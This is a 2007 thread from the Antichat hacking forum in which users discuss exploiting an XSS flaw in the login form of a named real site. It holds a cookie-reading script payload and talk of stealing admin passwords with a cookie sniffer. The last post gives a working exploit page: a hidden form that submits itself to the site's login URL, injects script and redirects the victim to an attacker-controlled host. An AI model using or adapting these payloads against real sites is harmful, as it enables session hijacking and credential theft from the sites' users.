ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Forum for discussion of ANTICHAT
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

another question for xss
  #1  
Старый 11.11.2007, 20:06
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию another question for xss

well

if u try to put some string like this
Код:
"><script>alert(document.cookie)</script>
on nick+login in that site



http://www.proplay.ru/




result:







Another site:







my question:


You think that can be exploitable?
 
Ответить с цитированием

  #2  
Старый 11.11.2007, 20:55
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Just if request method is get, because method post is invisible.
 
Ответить с цитированием

  #3  
Старый 11.11.2007, 21:14
Аватар для Fugitif
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

I have found many site vulnerable to xss on admin (user) login,and I think that using some cookie sniffer can be done something.


thx for your answer Mr.NOmeR1 (you are right)
 
Ответить с цитированием

  #4  
Старый 16.11.2007, 14:57
Аватар для ~EviL~
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

Even if the request method is post, you can write a PHP script to post the data, and it will be still exploitable. If I am wrong, correct me =)
 
Ответить с цитированием

  #5  
Старый 16.11.2007, 15:02
Аватар для inv
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141

Репутация: 291
По умолчанию

you can use post (it will be better)
you can get admin's passwd ( use javascript)
sorry for my english
 
Ответить с цитированием

  #6  
Старый 16.11.2007, 19:54
Аватар для Macro
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Цитата:
Сообщение от ~EviL~  
Even if the request method is post, you can write a PHP script to post the data, and it will be still exploitable. If I am wrong, correct me =)
You're right, but there isn't a neccessity to write php script, you can use just javascript and html
 
Ответить с цитированием

  #7  
Старый 16.11.2007, 21:31
Аватар для LeverOne
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
Cool

http://www.proplay.ru/

- method GET not supported
- no referer-control


http://yourhost.xz/g.html - link with XSS-exploit

file g.html

Код:
<body onload='document.forms[0].submit()'>
<form method="post" action="http://www.proplay.ru/users/login/">
<input name="name" value='"><script>alert(document.cookie);document.location.href=\"http://yourhost.xz/q.html\";</script>' style="visibility:hidden;display:none">
</form>
redirect -->> q.html with any content

Another site -->> by analogy
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
noob question - SQL GaLLe0n PHP, PERL, MySQL, JavaScript 6 04.11.2006 21:18
Question about c99 shell core Forum for discussion of ANTICHAT 1 24.05.2006 18:20
question ShitHappens E-Mail 34 23.03.2006 14:54
ipb question caffine2 Forum for discussion of ANTICHAT 4 27.12.2005 21:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ